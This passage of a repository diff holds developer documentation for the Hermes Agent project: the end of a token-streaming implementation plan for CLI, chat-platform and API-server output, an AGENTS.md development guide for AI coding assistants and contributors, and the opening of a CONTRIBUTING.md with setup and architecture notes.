except Exception:
pass
# Env var override
if os.getenv("HERMES_STREAMING_ENABLED", "").lower() in ("true", "1", "yes"):
_streaming_enabled = True
```
#### 2b. Set up queue + callback (~15 lines)
```python
_stream_q = None
_stream_done = None
_stream_msg_id = [None] # mutable ref for the async task
if _streaming_enabled:
import queue as _q
_stream_q = _q.Queue()
_stream_done = threading.Event()
def _on_token(delta):
if delta is None:
_stream_done.set()
else:
_stream_q.put(delta)
```
Pass `stream_callback=_on_token` to the AIAgent constructor.
#### 2c. Telegram/Discord stream preview task (~50 lines)
```python
async def stream_preview():
"""Progressively edit a message with streaming tokens."""
if not _stream_q:
return
adapter = self.adapters.get(source.platform)
if not adapter:
return
accumulated = []
token_count = 0
last_edit = 0.0
MIN_TOKENS = 20 # Don't show until enough context
EDIT_INTERVAL = 1.5 # Respect Telegram rate limits
try:
while not _stream_done.is_set():
try:
chunk = _stream_q.get(timeout=0.1)
accumulated.append(chunk)
token_count += 1
except queue.Empty:
continue
now = time.monotonic()
if token_count >= MIN_TOKENS and (now - last_edit) >= EDIT_INTERVAL:
preview = "".join(accumulated) + ""
if _stream_msg_id[0] is None:
r = await adapter.send(
chat_id=source.chat_id,
content=preview,
metadata=_thread_metadata,
)
if r.success and r.message_id:
_stream_msg_id[0] = r.message_id
else:
await adapter.edit_message(
chat_id=source.chat_id,
message_id=_stream_msg_id[0],
content=preview,
)
last_edit = now
# Drain remaining tokens
while not _stream_q.empty():
accumulated.append(_stream_q.get_nowait())
# Final edit — remove cursor, show complete text
if _stream_msg_id[0] and accumulated:
await adapter.edit_message(
chat_id=source.chat_id,
message_id=_stream_msg_id[0],
content="".join(accumulated),
)
except asyncio.CancelledError:
# Clean up on cancel
if _stream_msg_id[0] and accumulated:
try:
await adapter.edit_message(
chat_id=source.chat_id,
message_id=_stream_msg_id[0],
content="".join(accumulated),
)
except Exception:
pass
except Exception as e:
logger.debug("stream_preview error: %s", e)
```
#### 2d. Skip final send if already streamed (~10 lines)
In `_process_message_background()` (base.py), after getting the response,
if streaming was active and `_stream_msg_id[0]` is set, the final response
was already delivered via progressive edits. Skip the normal `self.send()`
call to avoid duplicating the message.
This is the most delicate integration point — we need to communicate from
the gateway's `_run_agent` back to the base adapter's response sender that
the response was already delivered. Options:
- **Option A**: Return a special marker in the result dict:
`result["_streamed_msg_id"] = _stream_msg_id[0]`
The base adapter checks this and skips `send()`.
- **Option B**: Edit the already-sent message with the final response
(which may differ slightly from accumulated tokens due to think-block
stripping, etc.) and don't send a new one.
- **Option C**: The stream preview task handles the FULL final response
(including any post-processing), and the handler returns None to skip
the normal send path.
Recommended: **Option A** — cleanest separation. The result dict already
carries metadata; adding one more field is low-risk.
**Platform-specific considerations:**
| Platform | Edit support | Rate limits | Streaming approach |
|----------|-------------|-------------|-------------------|
| Telegram | ✅ edit_message_text | ~20 edits/min | Edit every 1.5s |
| Discord | ✅ message.edit | 5 edits/5s per message | Edit every 1.2s |
| Slack | ✅ chat.update | Tier 3 (~50/min) | Edit every 1.5s |
| WhatsApp | ❌ no edit support | N/A | Skip streaming, use normal path |
| HomeAssistant | ❌ no edit | N/A | Skip streaming |
| API Server | ✅ SSE native | No limit | Real SSE events |
WhatsApp and HomeAssistant fall back to non-streaming automatically because
they don't support message editing.
**Tests for Phase 2:** (~100 lines)
- Test stream_preview sends/edits correctly
- Test skip-final-send when streaming delivered
- Test WhatsApp/HA graceful fallback
- Test streaming disabled per-platform config
- Test thread_id metadata forwarded in stream messages
---
### Phase 3: CLI streaming
**File: cli.py**
#### 3a. Set up callback in the CLI chat loop (~20 lines)
In `_chat_once()` or wherever the agent is invoked:
```python
if streaming_enabled:
_stream_q = queue.Queue()
_stream_done = threading.Event()
def _cli_stream_callback(delta):
if delta is None:
_stream_done.set()
else:
_stream_q.put(delta)
agent.stream_callback = _cli_stream_callback
```
#### 3b. Token display thread/task (~30 lines)
Start a thread that reads the queue and prints tokens:
```python
def _stream_display():
"""Print tokens to terminal as they arrive."""
first_token = True
while not _stream_done.is_set():
try:
delta = _stream_q.get(timeout=0.1)
except queue.Empty:
continue
if first_token:
# Print response box top border
_cprint(f"\n{top}")
first_token = False
sys.stdout.write(delta)
sys.stdout.flush()
# Drain remaining
while not _stream_q.empty():
sys.stdout.write(_stream_q.get_nowait())
sys.stdout.flush()
# Print bottom border
_cprint(f"\n\n{bot}")
```
**Integration challenge: prompt_toolkit**
The CLI uses prompt_toolkit which controls the terminal. Writing directly
to stdout while prompt_toolkit is active can cause display corruption.
The existing KawaiiSpinner already solves this by using prompt_toolkit's
`patch_stdout` context. The streaming display would need to do the same.
Alternative: use `_cprint()` for each token chunk (routes through
prompt_toolkit's renderer). But this might be slow for individual tokens.
Recommended approach: accumulate tokens in small batches (e.g., every 50ms)
and `_cprint()` the batch. This balances display responsiveness with
prompt_toolkit compatibility.
**Tests for Phase 3:** (~50 lines)
- Test CLI streaming callback setup
- Test response box borders with streaming
- Test fallback when streaming disabled
---
### Phase 4: API Server real streaming
**File: gateway/platforms/api_server.py**
Replace the pseudo-streaming `_write_sse_chat_completion()` with real
token-by-token SSE when the agent supports it.
#### 4a. Wire streaming callback for stream=true requests (~20 lines)
```python
if stream:
_stream_q = queue.Queue()
def _api_stream_callback(delta):
_stream_q.put(delta) # None = done
# Pass callback to _run_agent
result, usage = await self._run_agent(
..., stream_callback=_api_stream_callback,
)
```
#### 4b. Real SSE writer (~40 lines)
```python
async def _write_real_sse(self, request, completion_id, model, stream_q):
response = web.StreamResponse(
headers={"Content-Type": "text/event-stream", "Cache-Control": "no-cache"},
)
await response.prepare(request)
# Role chunk
await response.write(...)
# Stream content chunks as they arrive
while True:
try:
delta = await asyncio.get_event_loop().run_in_executor(
None, lambda: stream_q.get(timeout=0.1)
)
except queue.Empty:
continue
if delta is None: # End of stream
break
chunk = {"id": completion_id, "object": "chat.completion.chunk", ...
"choices": [{"delta": {"content": delta}, ...}]}
await response.write(f"data: {json.dumps(chunk)}\n\n".encode())
# Finish + [DONE]
await response.write(...)
await response.write(b"data: [DONE]\n\n")
return response
```
**Challenge: concurrent execution**
The agent runs in a thread executor. SSE writing happens in the async event
loop. The queue bridges them. But `_run_agent()` currently awaits the full
result before returning. For real streaming, we need to start the agent in
the background and stream tokens while it runs:
```python
# Start agent in background
agent_task = asyncio.create_task(self._run_agent_async(...))
# Stream tokens while agent runs
await self._write_real_sse(request, ..., stream_q)
# Agent is done by now (stream_q received None)
result, usage = await agent_task
```
This requires splitting `_run_agent` into an async version that doesn't
block waiting for the result, or running it in a separate task.
**Responses API SSE format:**
For `/v1/responses` with `stream=true`, the SSE events are different:
```
event: response.output_text.delta
data: {"type":"response.output_text.delta","delta":"Hello"}
event: response.completed
data: {"type":"response.completed","response":{...}}
```
This needs a separate SSE writer that emits Responses API format events.
**Tests for Phase 4:** (~80 lines)
- Test real SSE streaming with mocked agent
- Test SSE event format (Chat Completions vs Responses)
- Test client disconnect during streaming
- Test fallback to pseudo-streaming when callback not available
---
## Integration Issues & Edge Cases
### 1. Tool calls during streaming
When the model returns tool calls instead of text, no text tokens are emitted.
The stream_callback is simply never called with text. After tools execute, the
next API call may produce the final text response — streaming picks up again.
The stream preview task needs to handle this: if no tokens arrive during a
tool-call round, don't send/edit any message. The tool progress messages
continue working as before.
### 2. Duplicate messages
The biggest risk: the agent sends the final response normally (via the
existing send path) AND the stream preview already showed it. The user
sees the response twice.
Prevention: when streaming is active and tokens were delivered, the final
response send must be suppressed. The `result["_streamed_msg_id"]` marker
tells the base adapter to skip its normal send.
### 3. Response post-processing
The final response may differ from the accumulated streamed tokens:
- Think block stripping (`<think>...</think>` removed)
- Trailing whitespace cleanup
- Tool result media tag appending
The stream preview shows raw tokens. The final edit should use the
post-processed version. This means the final edit (removing the cursor)
should use the post-processed `final_response`, not just the accumulated
stream text.
### 4. Context compression during streaming
If the agent triggers context compression mid-conversation, the streaming
tokens from BEFORE compression are from a different context than those
after. This isn't a problem in practice — compression happens between
API calls, not during streaming.
### 5. Interrupt during streaming
User sends a new message while streaming → interrupt. The stream is killed
(HTTP connection closed), accumulated tokens are shown as-is (no cursor),
and the interrupt message is processed normally. This is already handled by
`_interruptible_api_call` closing the client.
### 6. Multi-model / fallback
If the primary model fails and the agent falls back to a different model,
streaming state resets. The fallback call may or may not support streaming.
The graceful fallback in `_run_streaming_chat_completion` handles this.
### 7. Rate limiting on edits
Telegram: ~20 edits/minute (~1 every 3 seconds to be safe)
Discord: 5 edits per 5 seconds per message
Slack: ~50 API calls/minute
The 1.5s edit interval is conservative enough for all platforms. If we get
429 rate limit errors on edits, just skip that edit cycle and try next time.
---
## Files Changed Summary
| File | Phase | Changes |
|------|-------|---------|
| `run_agent.py` | 1 | +stream_callback param, +_run_streaming_chat_completion(), modify _run_codex_stream(), modify _interruptible_api_call() |
| `gateway/run.py` | 2 | +streaming config reader, +queue/callback setup, +stream_preview task, +skip-final-send logic |
| `gateway/platforms/base.py` | 2 | +check for _streamed_msg_id in response handler |
| `cli.py` | 3 | +streaming setup, +token display, +response box integration |
| `gateway/platforms/api_server.py` | 4 | +real SSE writer, +streaming callback wiring |
| `hermes_cli/config.py` | 1 | +streaming config defaults |
| `cli-config.yaml.example` | 1 | +streaming section |
| `tests/test_streaming.py` | 1-4 | NEW — ~380 lines of tests |
**Total new code**: ~500 lines across all phases
**Total test code**: ~380 lines
---
## Rollout Plan
1. **Phase 1** (core): Merge to main. Streaming disabled by default.
Zero impact on existing behavior. Can be tested with env var.
2. **Phase 2** (gateway): Merge to main. Test on Telegram manually.
Enable per-platform: `streaming.telegram: true` in config.
3. **Phase 3** (CLI): Merge to main. Test in terminal.
Enable: `streaming.cli: true` or `streaming.enabled: true`.
4. **Phase 4** (API server): Merge to main. Test with Open WebUI.
Auto-enabled when client sends `stream: true`.
Each phase is independently mergeable and testable. Streaming stays
off by default throughout. Once all phases are stable, consider
changing the default to enabled.
---
## Config Reference (final state)
```yaml
# config.yaml
streaming:
enabled: false # Master switch (default: off)
cli: true # Per-platform override
telegram: true
discord: true
slack: true
api_server: true # API server always streams when client requests it
edit_interval: 1.5 # Seconds between message edits (default: 1.5)
min_tokens: 20 # Tokens before first display (default: 20)
```
```bash
# Environment variable override
HERMES_STREAMING_ENABLED=true
```

348
AGENTS.md Normal file
View File

@@ -0,0 +1,348 @@
# Hermes Agent - Development Guide
Instructions for AI coding assistants and developers working on the hermes-agent codebase.
## Development Environment
```bash
source .venv/bin/activate # ALWAYS activate before running Python
```
## Project Structure
```
hermes-agent/
├── run_agent.py # AIAgent class — core conversation loop
├── model_tools.py # Tool orchestration, _discover_tools(), handle_function_call()
├── toolsets.py # Toolset definitions, _HERMES_CORE_TOOLS list
├── cli.py # HermesCLI class — interactive CLI orchestrator
├── hermes_state.py # SessionDB — SQLite session store (FTS5 search)
├── agent/ # Agent internals
│ ├── prompt_builder.py # System prompt assembly
│ ├── context_compressor.py # Auto context compression
│ ├── prompt_caching.py # Anthropic prompt caching
│ ├── auxiliary_client.py # Auxiliary LLM client (vision, summarization)
│ ├── model_metadata.py # Model context lengths, token estimation
│ ├── display.py # KawaiiSpinner, tool preview formatting
│ ├── skill_commands.py # Skill slash commands (shared CLI/gateway)
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI subcommands and setup
│ ├── main.py # Entry point — all `hermes` subcommands
│ ├── config.py # DEFAULT_CONFIG, OPTIONAL_ENV_VARS, migration
│ ├── commands.py # Slash command definitions + SlashCommandCompleter
│ ├── callbacks.py # Terminal callbacks (clarify, sudo, approval)
│ ├── setup.py # Interactive setup wizard
│ ├── skin_engine.py # Skin/theme engine — CLI visual customization
│ ├── skills_config.py # `hermes skills` — enable/disable skills per platform
│ ├── tools_config.py # `hermes tools` — enable/disable tools per platform
│ ├── skills_hub.py # `/skills` slash command (search, browse, install)
│ ├── models.py # Model catalog, provider model lists
│ └── auth.py # Provider credential resolution
├── tools/ # Tool implementations (one file per tool)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection
│ ├── terminal_tool.py # Terminal orchestration
│ ├── process_registry.py # Background process management
│ ├── file_tools.py # File read/write/search/patch
│ ├── web_tools.py # Firecrawl search/extract
│ ├── browser_tool.py # Browserbase browser automation
│ ├── code_execution_tool.py # execute_code sandbox
│ ├── delegate_tool.py # Subagent delegation
│ ├── mcp_tool.py # MCP client (~1050 lines)
│ └── environments/ # Terminal backends (local, docker, ssh, modal, daytona, singularity)
├── gateway/ # Messaging platform gateway
│ ├── run.py # Main loop, slash commands, message dispatch
│ ├── session.py # SessionStore — conversation persistence
│ └── platforms/ # Adapters: telegram, discord, slack, whatsapp, homeassistant, signal
├── acp_adapter/ # ACP server (VS Code / Zed / JetBrains integration)
├── cron/ # Scheduler (jobs.py, scheduler.py)
├── environments/ # RL training environments (Atropos)
├── tests/ # Pytest suite (~3000 tests)
└── batch_runner.py # Parallel batch processing
```
**User config:** `~/.hermes/config.yaml` (settings), `~/.hermes/.env` (API keys)
## File Dependency Chain
```
tools/registry.py (no deps — imported by all tool files)
tools/*.py (each calls registry.register() at import time)
model_tools.py (imports tools/registry + triggers tool discovery)
run_agent.py, cli.py, batch_runner.py, environments/
```
---
## AIAgent Class (run_agent.py)
```python
class AIAgent:
def __init__(self,
model: str = "anthropic/claude-opus-4.6",
max_iterations: int = 90,
enabled_toolsets: list = None,
disabled_toolsets: list = None,
quiet_mode: bool = False,
save_trajectories: bool = False,
platform: str = None, # "cli", "telegram", etc.
session_id: str = None,
skip_context_files: bool = False,
skip_memory: bool = False,
# ... plus provider, api_mode, callbacks, routing params
): ...
def chat(self, message: str) -> str:
"""Simple interface — returns final response string."""
def run_conversation(self, user_message: str, system_message: str = None,
conversation_history: list = None, task_id: str = None) -> dict:
"""Full interface — returns dict with final_response + messages."""
```
### Agent Loop
The core loop is inside `run_conversation()` — entirely synchronous:
```python
while api_call_count < self.max_iterations and self.iteration_budget.remaining > 0:
response = client.chat.completions.create(model=model, messages=messages, tools=tool_schemas)
if response.tool_calls:
for tool_call in response.tool_calls:
result = handle_function_call(tool_call.name, tool_call.args, task_id)
messages.append(tool_result_message(result))
api_call_count += 1
else:
return response.content
```
Messages follow OpenAI format: `{"role": "system/user/assistant/tool", ...}`. Reasoning content is stored in `assistant_msg["reasoning"]`.
---
## CLI Architecture (cli.py)
- **Rich** for banner/panels, **prompt_toolkit** for input with autocomplete
- **KawaiiSpinner** (`agent/display.py`) — animated faces during API calls, `┊` activity feed for tool results
- `load_cli_config()` in cli.py merges hardcoded defaults + user config YAML
- **Skin engine** (`hermes_cli/skin_engine.py`) — data-driven CLI theming; initialized from `display.skin` config key at startup; skins customize banner colors, spinner faces/verbs/wings, tool prefix, response box, branding text
- `process_command()` is a method on `HermesCLI` (not in commands.py)
- Skill slash commands: `agent/skill_commands.py` scans `~/.hermes/skills/`, injects as **user message** (not system prompt) to preserve prompt caching
### Adding CLI Commands
1. Add to `COMMANDS` dict in `hermes_cli/commands.py`
2. Add handler in `HermesCLI.process_command()` in `cli.py`
3. For persistent settings, use `save_config_value()` in `cli.py`
---
## Adding New Tools
Requires changes in **3 files**:
**1. Create `tools/your_tool.py`:**
```python
import json, os
from tools.registry import registry
def check_requirements() -> bool:
return bool(os.getenv("EXAMPLE_API_KEY"))
def example_tool(param: str, task_id: str = None) -> str:
return json.dumps({"success": True, "data": "..."})
registry.register(
name="example_tool",
toolset="example",
schema={"name": "example_tool", "description": "...", "parameters": {...}},
handler=lambda args, **kw: example_tool(param=args.get("param", ""), task_id=kw.get("task_id")),
check_fn=check_requirements,
requires_env=["EXAMPLE_API_KEY"],
)
```
**2. Add import** in `model_tools.py` `_discover_tools()` list.
**3. Add to `toolsets.py`** — either `_HERMES_CORE_TOOLS` (all platforms) or a new toolset.
The registry handles schema collection, dispatch, availability checking, and error wrapping. All handlers MUST return a JSON string.
**Agent-level tools** (todo, memory): intercepted by `run_agent.py` before `handle_function_call()`. See `todo_tool.py` for the pattern.
---
## Adding Configuration
### config.yaml options:
1. Add to `DEFAULT_CONFIG` in `hermes_cli/config.py`
2. Bump `_config_version` (currently 5) to trigger migration for existing users
### .env variables:
1. Add to `OPTIONAL_ENV_VARS` in `hermes_cli/config.py` with metadata:
```python
"NEW_API_KEY": {
"description": "What it's for",
"prompt": "Display name",
"url": "https://...",
"password": True,
"category": "tool", # provider, tool, messaging, setting
},
```
### Config loaders (two separate systems):
| Loader | Used by | Location |
|--------|---------|----------|
| `load_cli_config()` | CLI mode | `cli.py` |
| `load_config()` | `hermes tools`, `hermes setup` | `hermes_cli/config.py` |
| Direct YAML load | Gateway | `gateway/run.py` |
---
## Skin/Theme System
The skin engine (`hermes_cli/skin_engine.py`) provides data-driven CLI visual customization. Skins are **pure data** — no code changes needed to add a new skin.
### Architecture
```
hermes_cli/skin_engine.py # SkinConfig dataclass, built-in skins, YAML loader
~/.hermes/skins/*.yaml # User-installed custom skins (drop-in)
```
- `init_skin_from_config()` — called at CLI startup, reads `display.skin` from config
- `get_active_skin()` — returns cached `SkinConfig` for the current skin
- `set_active_skin(name)` — switches skin at runtime (used by `/skin` command)
- `load_skin(name)` — loads from user skins first, then built-ins, then falls back to default
- Missing skin values inherit from the `default` skin automatically
### What skins customize
| Element | Skin Key | Used By |
|---------|----------|---------|
| Banner panel border | `colors.banner_border` | `banner.py` |
| Banner panel title | `colors.banner_title` | `banner.py` |
| Banner section headers | `colors.banner_accent` | `banner.py` |
| Banner dim text | `colors.banner_dim` | `banner.py` |
| Banner body text | `colors.banner_text` | `banner.py` |
| Response box border | `colors.response_border` | `cli.py` |
| Spinner faces (waiting) | `spinner.waiting_faces` | `display.py` |
| Spinner faces (thinking) | `spinner.thinking_faces` | `display.py` |
| Spinner verbs | `spinner.thinking_verbs` | `display.py` |
| Spinner wings (optional) | `spinner.wings` | `display.py` |
| Tool output prefix | `tool_prefix` | `display.py` |
| Agent name | `branding.agent_name` | `banner.py`, `cli.py` |
| Welcome message | `branding.welcome` | `cli.py` |
| Response box label | `branding.response_label` | `cli.py` |
| Prompt symbol | `branding.prompt_symbol` | `cli.py` |
### Built-in skins
- `default` — Classic Hermes gold/kawaii (the current look)
- `ares` — Crimson/bronze war-god theme with custom spinner wings
- `mono` — Clean grayscale monochrome
- `slate` — Cool blue developer-focused theme
### Adding a built-in skin
Add to `_BUILTIN_SKINS` dict in `hermes_cli/skin_engine.py`:
```python
"mytheme": {
"name": "mytheme",
"description": "Short description",
"colors": { ... },
"spinner": { ... },
"branding": { ... },
"tool_prefix": "",
},
```
### User skins (YAML)
Users create `~/.hermes/skins/<name>.yaml`:
```yaml
name: cyberpunk
description: Neon-soaked terminal theme
colors:
banner_border: "#FF00FF"
banner_title: "#00FFFF"
banner_accent: "#FF1493"
spinner:
thinking_verbs: ["jacking in", "decrypting", "uploading"]
wings:
- ["⟨⚡", "⚡⟩"]
branding:
agent_name: "Cyber Agent"
response_label: " ⚡ Cyber "
tool_prefix: "▏"
```
Activate with `/skin cyberpunk` or `display.skin: cyberpunk` in config.yaml.
---
## Important Policies
### Prompt Caching Must Not Break
Hermes-Agent ensures caching remains valid throughout a conversation. **Do NOT implement changes that would:**
- Alter past context mid-conversation
- Change toolsets mid-conversation
- Reload memories or rebuild system prompts mid-conversation
Cache-breaking forces dramatically higher costs. The ONLY time we alter context is during context compression.
### Working Directory Behavior
- **CLI**: Uses current directory (`.``os.getcwd()`)
- **Messaging**: Uses `MESSAGING_CWD` env var (default: home directory)
### Background Process Notifications (Gateway)
When `terminal(background=true, check_interval=...)` is used, the gateway runs a watcher that
pushes status updates to the user's chat. Control verbosity with `display.background_process_notifications`
in config.yaml (or `HERMES_BACKGROUND_NOTIFICATIONS` env var):
- `all` — running-output updates + final message (default)
- `result` — only the final completion message
- `error` — only the final message when exit code != 0
- `off` — no watcher messages at all
---
## Known Pitfalls
### DO NOT use `simple_term_menu` for interactive menus
Rendering bugs in tmux/iTerm2 — ghosting on scroll. Use `curses` (stdlib) instead. See `hermes_cli/tools_config.py` for the pattern.
### DO NOT use `\033[K` (ANSI erase-to-EOL) in spinner/display code
Leaks as literal `?[K` text under `prompt_toolkit`'s `patch_stdout`. Use space-padding: `f"\r{line}{' ' * pad}"`.
### `_last_resolved_tool_names` is a process-global in `model_tools.py`
When subagents overwrite this global, `execute_code` calls after delegation may fail with missing tool imports. Known bug.
### Tests must not write to `~/.hermes/`
The `_isolate_hermes_home` autouse fixture in `tests/conftest.py` redirects `HERMES_HOME` to a temp dir. Never hardcode `~/.hermes/` paths in tests.
---
## Testing
```bash
source .venv/bin/activate
python -m pytest tests/ -q # Full suite (~3000 tests, ~3 min)
python -m pytest tests/test_model_tools.py -q # Toolset resolution
python -m pytest tests/test_cli_init.py -q # CLI config loading
python -m pytest tests/gateway/ -q # Gateway tests
python -m pytest tests/tools/ -q # Tool-level tests
```
Always run the full suite before pushing changes.

659
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,659 @@
# Contributing to Hermes Agent
Thank you for contributing to Hermes Agent! This guide covers everything you need: setting up your dev environment, understanding the architecture, deciding what to build, and getting your PR merged.
---
## Contribution Priorities
We value contributions in this order:
1. **Bug fixes** — crashes, incorrect behavior, data loss. Always top priority.
2. **Cross-platform compatibility** — Windows, macOS, different Linux distros, different terminal emulators. We want Hermes to work everywhere.
3. **Security hardening** — shell injection, prompt injection, path traversal, privilege escalation. See [Security](#security-considerations).
4. **Performance and robustness** — retry logic, error handling, graceful degradation.
5. **New skills** — but only broadly useful ones. See [Should it be a Skill or a Tool?](#should-it-be-a-skill-or-a-tool)
6. **New tools** — rarely needed. Most capabilities should be skills. See below.
7. **Documentation** — fixes, clarifications, new examples.
---
## Should it be a Skill or a Tool?
This is the most common question for new contributors. The answer is almost always **skill**.
### Make it a Skill when:
- The capability can be expressed as instructions + shell commands + existing tools
- It wraps an external CLI or API that the agent can call via `terminal` or `web_extract`
- It doesn't need custom Python integration or API key management baked into the agent
- Examples: arXiv search, git workflows, Docker management, PDF processing, email via CLI tools
### Make it a Tool when:
- It requires end-to-end integration with API keys, auth flows, or multi-component configuration managed by the agent harness
- It needs custom processing logic that must execute precisely every time (not "best effort" from LLM interpretation)
- It handles binary data, streaming, or real-time events that can't go through the terminal
- Examples: browser automation (Browserbase session management), TTS (audio encoding + platform delivery), vision analysis (base64 image handling)
### Should the Skill be bundled?
Bundled skills (in `skills/`) ship with every Hermes install. They should be **broadly useful to most users**:
- Document handling, web research, common dev workflows, system administration
- Used regularly by a wide range of people
If your skill is official and useful but not universally needed (e.g., a paid service integration, a heavyweight dependency), put it in **`optional-skills/`** — it ships with the repo but isn't activated by default. Users can discover it via `hermes skills browse` (labeled "official") and install it with `hermes skills install` (no third-party warning, builtin trust).
If your skill is specialized, community-contributed, or niche, it's better suited for a **Skills Hub** — upload it to a skills registry and share it in the [Nous Research Discord](https://discord.gg/NousResearch). Users can install it with `hermes skills install`.
---
## Development Setup
### Prerequisites
| Requirement | Notes |
|-------------|-------|
| **Git** | With `--recurse-submodules` support |
| **Python 3.11+** | uv will install it if missing |
| **uv** | Fast Python package manager ([install](https://docs.astral.sh/uv/)) |
| **Node.js 18+** | Optional — needed for browser tools and WhatsApp bridge |
### Clone and install
```bash
git clone --recurse-submodules https://github.com/NousResearch/hermes-agent.git
cd hermes-agent
# Create venv with Python 3.11
uv venv venv --python 3.11
export VIRTUAL_ENV="$(pwd)/venv"
# Install with all extras (messaging, cron, CLI menus, dev tools)
uv pip install -e ".[all,dev]"
uv pip install -e "./mini-swe-agent"
uv pip install -e "./tinker-atropos"
# Optional: browser tools
npm install
```
### Configure for development
```bash
mkdir -p ~/.hermes/{cron,sessions,logs,memories,skills}
cp cli-config.yaml.example ~/.hermes/config.yaml
touch ~/.hermes/.env
# Add at minimum an LLM provider key:
echo 'OPENROUTER_API_KEY=sk-or-v1-your-key' >> ~/.hermes/.env
```
### Run
```bash
# Symlink for global access
mkdir -p ~/.local/bin
ln -sf "$(pwd)/venv/bin/hermes" ~/.local/bin/hermes
# Verify
hermes doctor
hermes chat -q "Hello"
```
### Run tests
```bash
pytest tests/ -v
```
---
## Project Structure
```
hermes-agent/
├── run_agent.py # AIAgent class — core conversation loop, tool dispatch, session persistence
├── cli.py # HermesCLI class — interactive TUI, prompt_toolkit integration
├── model_tools.py # Tool orchestration (thin layer over tools/registry.py)
├── toolsets.py # Tool groupings and presets (hermes-cli, hermes-telegram, etc.)
├── hermes_state.py # SQLite session database with FTS5 full-text search, session titles
├── batch_runner.py # Parallel batch processing for trajectory generation
├── agent/ # Agent internals (extracted modules)
│ ├── prompt_builder.py # System prompt assembly (identity, skills, context files, memory)
│ ├── context_compressor.py # Auto-summarization when approaching context limits
│ ├── auxiliary_client.py # Resolves auxiliary OpenAI clients (summarization, vision)
│ ├── display.py # KawaiiSpinner, tool progress formatting
│ ├── model_metadata.py # Model context lengths, token estimation
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI command implementations
│ ├── main.py # Entry point, argument parsing, command dispatch
│ ├── config.py # Config management, migration, env var definitions
│ ├── setup.py # Interactive setup wizard
│ ├── auth.py # Provider resolution, OAuth, Nous Portal
│ ├── models.py # OpenRouter model selection lists
│ ├── banner.py # Welcome banner, ASCII art
│ ├── commands.py # Slash command definitions + autocomplete
│ ├── callbacks.py # Interactive callbacks (clarify, sudo, approval)
│ ├── doctor.py # Diagnostics
│ ├── skills_hub.py # Skills Hub CLI + /skills slash command
│ └── skin_engine.py # Skin/theme engine — data-driven CLI visual customization
├── tools/ # Tool implementations (self-registering)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection + per-session approval
│ ├── terminal_tool.py # Terminal orchestration (sudo, env lifecycle, backends)
│ ├── file_operations.py # read_file, write_file, search, patch, etc.
│ ├── web_tools.py # web_search, web_extract (Firecrawl + Gemini summarization)
│ ├── vision_tools.py # Image analysis via multimodal models
│ ├── delegate_tool.py # Subagent spawning and parallel task execution
│ ├── code_execution_tool.py # Sandboxed Python with RPC tool access
│ ├── session_search_tool.py # Search past conversations with FTS5 + summarization
│ ├── cronjob_tools.py # Scheduled task management
│ ├── skill_tools.py # Skill search, load, manage
│ └── environments/ # Terminal execution backends
│ ├── base.py # BaseEnvironment ABC
│ ├── local.py, docker.py, ssh.py, singularity.py, modal.py, daytona.py
├── gateway/ # Messaging gateway
│ ├── run.py # GatewayRunner — platform lifecycle, message routing, cron
│ ├── config.py # Platform configuration resolution
│ ├── session.py # Session store, context prompts, reset policies
│ └── platforms/ # Platform adapters
│ ├── telegram.py, discord_adapter.py, slack.py, whatsapp.py
├── scripts/ # Installer and bridge scripts
│ ├── install.sh # Linux/macOS installer
│ ├── install.ps1 # Windows PowerShell installer
│ └── whatsapp-bridge/ # Node.js WhatsApp bridge (Baileys)
├── skills/ # Bundled skills (copied to ~/.hermes/skills/ on install)
├── optional-skills/ # Official optional skills (discoverable via hub, not activated by default)
├── environments/ # RL training environments (Atropos integration)
├── tests/ # Test suite
├── website/ # Documentation site (hermes-agent.nousresearch.com)
├── cli-config.yaml.example # Example configuration (copied to ~/.hermes/config.yaml)
└── AGENTS.md # Development guide for AI coding assistants
```
### User configuration (stored in `~/.hermes/`)
| Path | Purpose |
|------|---------|
| `~/.hermes/config.yaml` | Settings (model, terminal, toolsets, compression, etc.) |
| `~/.hermes/.env` | API keys and secrets |
| `~/.hermes/auth.json` | OAuth credentials (Nous Portal) |
| `~/.hermes/skills/` | All active skills (bundled + hub-installed + agent-created) |
| `~/.hermes/memories/` | Persistent memory (MEMORY.md, USER.md) |
| `~/.hermes/state.db` | SQLite session database |
| `~/.hermes/sessions/` | JSON session logs |
| `~/.hermes/cron/` | Scheduled job data |
| `~/.hermes/whatsapp/session/` | WhatsApp bridge credentials |
---
## Architecture Overview
### Core Loop
```
User message → AIAgent._run_agent_loop()
├── Build system prompt (prompt_builder.py)
├── Build API kwargs (model, messages, tools, reasoning config)
├── Call LLM (OpenAI-compatible API)
├── If tool_calls in response:
│ ├── Execute each tool via registry dispatch
│ ├── Add tool results to conversation
│ └── Loop back to LLM call
├── If text response:
│ ├── Persist session to DB
│ └── Return final_response
└── Context compression if approaching token limit
```
### Key Design Patterns
- **Self-registering tools**: Each tool file calls `registry.register()` at import time. `model_tools.py` triggers discovery by importing all tool modules.
- **Toolset grouping**: Tools are grouped into toolsets (`web`, `terminal`, `file`, `browser`, etc.) that can be enabled/disabled per platform.
- **Session persistence**: All conversations are stored in SQLite (`hermes_state.py`) with full-text search and unique session titles. JSON logs go to `~/.hermes/sessions/`.
- **Ephemeral injection**: System prompts and prefill messages are injected at API call time, never persisted to the database or logs.
- **Provider abstraction**: The agent works with any OpenAI-compatible API. Provider resolution happens at init time (Nous Portal OAuth, OpenRouter API key, or custom endpoint).
- **Provider routing**: When using OpenRouter, `provider_routing` in config.yaml controls provider selection (sort by throughput/latency/price, allow/ignore specific providers, data retention policies). These are injected as `extra_body.provider` in API requests.
---
## Code Style
- **PEP 8** with practical exceptions (we don't enforce strict line length)
- **Comments**: Only when explaining non-obvious intent, trade-offs, or API quirks. Don't narrate what the code does — `# increment counter` adds nothing
- **Error handling**: Catch specific exceptions. Log with `logger.warning()`/`logger.error()` — use `exc_info=True` for unexpected errors so stack traces appear in logs
- **Cross-platform**: Never assume Unix. See [Cross-Platform Compatibility](#cross-platform-compatibility)
---
## Adding a New Tool
Before writing a tool, ask: [should this be a skill instead?](#should-it-be-a-skill-or-a-tool)
Tools self-register with the central registry. Each tool file co-locates its schema, handler, and registration:
```python
"""my_tool — Brief description of what this tool does."""
import json
from tools.registry import registry
def my_tool(param1: str, param2: int = 10, **kwargs) -> str:
